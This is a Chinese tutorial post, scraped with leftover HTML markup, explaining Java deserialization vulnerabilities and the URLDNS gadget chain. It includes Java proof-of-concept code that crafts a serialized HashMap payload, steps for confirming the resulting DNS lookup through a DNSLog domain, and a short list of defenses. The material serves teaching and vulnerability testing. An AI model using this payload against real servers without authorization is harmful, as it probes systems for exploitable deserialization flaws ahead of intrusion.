Java反序列化漏洞基础与URLDNS利用链分析<\/h1>

0x01 序列化基础概念<\/h2>

序列化定义<\/h3>

序列化是指将一个对象转换为字节序列的过程，包含：<\/p>

对象的数据<\/li>
对象的类型<\/li>

对象中存储的属性等信息<\/li> <\/ul>

Java序列化实现<\/h3>

通过实现java.io.Serializable<\/code>接口<\/li>
只有实现了Serializable<\/code>接口的对象才能被序列化<\/li>

注意<\/strong>：序列化的是对象而不是类<\/li>
<\/ul>
序列化限制<\/h3>

静态属性<\/strong>不能序列化

原因：静态变量属于类，在类加载时获取内存空间存储在静态区<\/li>
访问方式：应直接通过类名访问而非对象引用<\/li>
<\/ul>
<\/li>
Transient瞬态属性<\/strong>不能序列化<\/li>
<\/ol>
序列化用途<\/h3>

数据持久化：将数据永久保存在硬盘上

通过输出流将内存中的数据保存在文件中<\/li>
<\/ul>
<\/li>
远程通信：在网络上传送对象的字节序列<\/li>
<\/ol>
反序列化<\/h3>

序列化的逆过程，将字节流转换回对象<\/li>
过程：开启输入流通道，Java从字节流中的信息重构对象并重新加载到内存<\/li>
<\/ul>
0x02 反序列化漏洞原理<\/h2>
漏洞产生原因<\/h3>

服务端反序列化数据时，客户端传递类的readObject<\/code>方法中的代码会自动执行<\/li>
本质：攻击者利用服务器反序列化过程执行恶意代码<\/li>
<\/ul>
反序列化利用形式<\/h3>

入口类的readObject<\/code>直接调用危险方法（不常见）<\/li>
入口类参数中包含可控类，该可控类有危险方法，被反序列化时被readObject<\/code>调用（不常见）<\/li>
入口参数中包含可控类，该可控类调用其他含有危险方法的类（常见）<\/li>
构造函数\/静态代码块等类加载时隐式执行<\/li>
<\/ol>
利用前提<\/h3>

利用链里的类必须继承Serializable<\/code><\/li>
危险方法通常不是指可控类本身的方法，而是指与可控类方法同名且类型相同的函数<\/li>
<\/ul>
0x03 URLDNS利用链分析<\/h2>
URLDNS链特点<\/h3>

学习Java反序列化的第一条Gadget Chain<\/li>
只能发起DNS请求，不能进行其他利用<\/li>
优点：

不限制JDK版本<\/li>
使用Java内置类，无第三方依赖要求<\/li>
目标无回显时，可通过DNS请求验证漏洞存在<\/li>
<\/ul>
<\/li>
<\/ol>
原理分析<\/h3>

java.util.HashMap<\/code>实现了Serializable<\/code>接口，重写了readObject<\/code><\/li>
反序列化时会调用hash<\/code>函数计算key的hashCode<\/code><\/li>
java.net.URL<\/code>实现了Serializable<\/code>接口，其hashCode<\/code>计算时会调用getHostAddress<\/code>解析域名，从而发出DNS请求<\/li>
<\/ul>
利用目的<\/h3>

序列化时不请求DNS<\/strong>，反序列化时请求DNS<\/strong><\/li>
实现方式：

序列化时hashCode<\/code>值不等于-1（直接返回不进行DNS解析）<\/li>
反序列化时hashCode<\/code>值等于-1（触发DNS解析）<\/li>
<\/ul>
<\/li>
<\/ul>
Gadget Chain调用流程<\/h3>
HashMap.readObject() 
--> HashMap.hash(URL) 
--> URL.hashCode()的handler.hashCode(即URLStreamHandler.hashCode()) 
--> URLStreamHandler.hashCode() 
--> URLStreamHandler.getHostAddress() 
--> InetAddress.getByName()
<\/code><\/pre>
0x04 代码实现与分析<\/h2>
测试代码关键部分<\/h3>
\/\/ 设置URL对象的hashCode为8888（序列化时不触发DNS）
<\/span><\/span><\/span><\/span>Field filed =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.net.URL"<\/span>).<\/span>getDeclaredField<\/span>(<\/span>"hashCode"<\/span>);<\/span>
<\/span><\/span>filed.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>  \/\/ 绕过权限检查
<\/span><\/span><\/span><\/span>filed.<\/span>set<\/span>(<\/span>url,<\/span> 8888<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 将URL对象放入HashMap（此时hashCode不为-1，不触发DNS）
<\/span><\/span><\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>url,<\/span> 23<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化前将hashCode设为-1（反序列化时将触发DNS）
<\/span><\/span><\/span><\/span>filed.<\/span>set<\/span>(<\/span>url,<\/span> -<\/span>1<\/span>);<\/span>
<\/span><\/span>serializable(<\/span>hashMap);<\/span>
<\/span><\/span><\/code><\/pre>代码分析要点<\/h3>

使用反射获取并修改URL对象的hashCode<\/code>字段<\/li>
通过setAccessible(true)<\/code>绕过Java语言权限控制<\/li>
序列化前将hashCode<\/code>设为非-1值避免立即触发DNS<\/li>
反序列化前将hashCode<\/code>设为-1确保触发DNS请求<\/li>
<\/ol>
0x05 实际测试与验证<\/h2>
测试步骤<\/h3>

使用DNSLog平台（如dnslog.org）获取临时域名<\/li>
在代码中设置目标URL为http:\/\/[your-id].dnslog.biz<\/code><\/li>
执行序列化生成payload文件<\/li>
在服务端模拟环境中反序列化该文件<\/li>
观察DNSLog平台是否收到请求<\/li>
<\/ol>
服务端模拟代码<\/h3>
public<\/span> static<\/span> void<\/span> unserializable<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    FileInputStream filein =<\/span> new<\/span> FileInputStream(<\/span>".\/hashmap.txt"<\/span>);<\/span>
<\/span><\/span>    ObjectInputStream inputStream =<\/span> new<\/span> ObjectInputStream(<\/span>filein);<\/span>
<\/span><\/span>    Object o =<\/span> inputStream.<\/span>readObject<\/span>();<\/span>  \/\/ 触发反序列化
<\/span><\/span><\/span><\/span>    filein.<\/span>close<\/span>();<\/span>
<\/span><\/span>    inputStream.<\/span>close<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x06 总结与扩展<\/h2>
URLDNS链价值<\/h3>

漏洞验证：确认目标是否存在反序列化漏洞<\/li>
信息收集：可能获取系统版本等信息<\/li>
<\/ol>
学习建议<\/h3>

深入理解Java反射机制<\/li>
掌握动态代理技术<\/li>
研究其他常见反序列化漏洞链（如Commons Collections等）<\/li>
<\/ol>
防御措施<\/h3>

避免反序列化不可信数据<\/li>
使用白名单机制限制可反序列化的类<\/li>
考虑使用替代方案（如JSON、XML等更安全的序列化格式）<\/li>
<\/ol>

Java反序列化漏洞基础与URLDNS利用链分析<\/h1>

0x01 序列化基础概念<\/h2>

0x02 反序列化漏洞原理<\/h2>

0x03 URLDNS利用链分析<\/h2>

0x04 代码实现与分析<\/h2>

0x05 实际测试与验证<\/h2>

0x06 总结与扩展<\/h2>

防御措施<\/h3> 避免反序列化不可信数据<\/li> 使用白名单机制限制可反序列化的类<\/li> 考虑使用替代方案（如JSON、XML等更安全的序列化格式）<\/li> <\/ol>

防御措施<\/h3>

避免反序列化不可信数据<\/li>
使用白名单机制限制可反序列化的类<\/li>
考虑使用替代方案（如JSON、XML等更安全的序列化格式）<\/li> <\/ol>